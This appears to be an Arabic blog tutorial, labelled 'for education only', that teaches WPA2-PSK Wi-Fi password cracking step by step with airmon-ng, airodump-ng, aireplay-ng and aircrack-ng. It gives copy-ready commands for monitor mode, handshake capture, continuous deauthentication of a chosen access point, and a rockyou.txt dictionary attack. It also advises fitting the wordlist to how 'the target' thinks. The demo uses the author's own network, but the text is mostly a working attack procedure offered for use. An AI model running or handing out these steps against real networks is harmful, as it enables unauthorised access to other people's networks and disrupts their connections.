اختراق الواى فاى wpa2/psk

for-education-only

مقدمه :

الاختراق ليس ادوات وزر سحرى يلزمك بعض الحيل التى تبتكرها بنفسك حسب الضروره

قبل ان تقرا الدرس نفذ هذا الامر فى ذهنك service brain start

ملحوظه :

اذا كان كارت الواى فاى لديك لا يدعم الحقن فلا فائده منها

خطوات العمل والادوات :

  1. تشغيل كارت الواى فاى
  2. تشغيل airmon-ng
  3. البحث عن الشبكات airodump-ng
  4. جمع الكاب
  5. عمل اتصال متكرر aireplay-ng
  6. استخراج الباسورد aircrack-ng

 

الخطوه الاولى :

اولا قم بتشغيل كارت الواى فاى عبر الامر التالى

screenshot-from-2016-09-07-17-46-28

للتاكد من انها تعمل اكتب ifconfig

screenshot-from-2016-09-07-17-47-34

الخطوه الثانيه :

airmon-ng start wlan0

لاحظ بعد تشغيل airmon خروج تنبيه بوجود خدمات تعمل تتعارض مع الاداه
لحل هذا اكتب kill وبعدها id الخدمه
kill 551

لاحظ ان monitor mode اتفعل على wlan0mon وهى ما سنعمل عليها للنهايه

Screenshot from 2016-09-07 17-49-44.png

 

 

الخطوه الثالثه :

البحث عن الشبكات المحيطة بنا عن طريق

airodump-ng wlan0mon

Screenshot from 2016-09-07 17-51-24.png

النتيجه كالتالى وجد الاكسيس الخاص بى memsbaba

ما يلزمنا هو الاتى

القناه CH

ماك ادريس الاكسيس BSSID

قوة الاشاره PWR وهى بالسالب فكلما قلت كلما كانت افضل

screenshot-from-2016-09-07-17-52-12

 

 

الخطوه الرابعه :

جمع الكاب ولكن قبل اى شىء للنشىء فولدر لنجمع داخله الكاب وملف كلمات المرور

افتح ترمينال جديد عبر ضغط ctrl + shift + n

واكتب الاتى

mkdir Desktop/wl

ثم توجه اليه عبر

cd Desktop/wl

Screenshot from 2016-09-07 17-54-30.png

 

من داخل فولدر wl نجمع الكاب عن طريق الاتى

airodump-ng -c 11 -w capname –bssid 00:11:22:33:44:55 wlan0mon

قم بتعديل

القناه -c

اسم الكاب -w

ماك الاكسيس –bssid

Screenshot from 2016-09-07 17-57-18.png

الخطوه الخامسه :

اتصال متكرر

اقفل الترمينال رقم 1 فوق وركز مع التالى

داخل المربع الاحمر سوف يظهر انه نجح فى جمع الهاش ولكن يتبقى خطوه

وهى عمل اتصال متكرر بالاكسيس بوينت

خدعه :

اذا فشلت aireplay فى المصادقه اعمل اتصال بالاكسيس عن طريق هاتفك باى باسورد وسوف تتم المصادقه

screenshot-from-2016-09-07-17-58-00

 

افتح ترمينال جديد ctrl + shift + n

ادخل

aireplay-ng -0 0 -a 00:11:22:33:44:55 wlan0mon

استبدل الماك بماك الاكسيس بوينت

Screenshot from 2016-09-07 17-59-54.png

 

 

عند ظهور handdhske فاعلم ان المصادقه نجحت وتم جمع الكاب بنجاح

Screenshot from 2016-09-07 18-00-13.png

وهذا هو ملف الكاب الذى سنستخدمه

Screenshot from 2016-09-07 18-00-31.png

الخطوه السادسه :

اغلق كل ما سبق

هجوم بوسطة wordlist الكالى لينكس يحتوى على ملفات كلمات مرور جاهزه كما يمكنك صناعة ملف خاص بك

حسب رنج الارقام والنوعيه عن طريق اداةcrunch

يتوقف نجاح هذه المهمه واختصار الوقت على اختيارك رنج ارقام حسب طبيعة تفكير الهدف

مثال لن تجد مصرى يكتب كلمة مرور jeson او mark

ولكن الان سوف نستخدم الــ wordlist الموجوده فى كالى وللبحث عنها افتح ترمينال

ادخل

locate wordlist

Screenshot from 2016-09-07 18-07-02.png

بعد البحث عن wordlist سوف يبحث عن اى ملف او فولدر بهذا الاسم مع مساره كالاتى

ولكن ما يلزمنا تحديدا ملف rockyou.txt

Screenshot from 2016-09-07 18-07-56.png

قم بنسخة الى فولدر wl

ادخل

cp /usr/share/wordlist/rockyou.txt Desktop/wl

Screenshot from 2016-09-07 18-09-00.png

تم النسخ بنجاح

الان معنا الكاب وملف كلمات المرور

screenshot-from-2016-09-07-18-09-12

 

فى نفس الترمينال السابق توجه الى فولدر wl

cd Desktop/wl

ثم اظهر ما بداخله

ls

Screenshot from 2016-09-07 18-10-50.png

 

 

الان تشغيل اداة aircrack-ng

aircrack-ng -w rockyou.txt capname-01.cap

Screenshot from 2016-09-07 18-12-40.png

 

الان aircrack تقوم بتجربة كل كلمات المرور التى فى rockyou

السطر الاول عدد كلمات المرور الكليه فى الملف وعدد الكلمات التى تم تجربتها

انظر 9 ثوانى قام بتجربة 5208 كلمة كلما ارتفعت امكانيات الجهاز كلما كان اسرع

Current passphrases : كلمه يجربها حاليا

Screenshot from 2016-09-07 18-13-30.png

 

الان لاختصار الوقت واظهار النتيجه النهائية سوف اقوم بوضع كلمة المرور الخاصه بى داخل ملف rockyou.txt

ملحوظة:

ملفات الـــ wordlist صعب فتحها بمحرر النصوص لاحتوائها على سطور كثيره جدا لذالك سنستخدم ام اضافة سطر جديد

sed -i “25000iabc*123456” rockyou.txt

الــ i هنا ترمز لرقم السطر

25000 رقم السطر

i الرمز

abc*123456 الكلمة المراد اضافتها

Screenshot from 2016-09-07 18-22-57.png

 

وعند تشغيل aircrack مره اخرى وقبل ان تبدا يجد الباسورد

KEY FOUND! [**********]

ملحوظة

البحث يتم عشوائى وليس بالترتيب فى هذا المثال وضعت الباسورد فى سطر 18 وفى الاسفل وجدها بعد 24 محاوله

Screenshot from 2016-09-07 18-36-35.png

 

الى الان انتهى المرح ولكن دروسنا لم تنتهى بعد فمازلت هناك اساليب اخرى

تابعنا عبر صفحتنا على فيسبوك >>>> https://www.facebook.com/el2tlinux
للاساله توجه لصفحتنا على فيسبوك وابحث عن الدرس وضع مشكلتك مرفق معها سكرين شوت للمشكله

 

One comment

اترك رد

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

شعار وردبرس.كوم

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   /  تغيير )

Google photo

أنت تعلق بإستخدام حساب Google. تسجيل خروج   /  تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   /  تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   /  تغيير )

Connecting to %s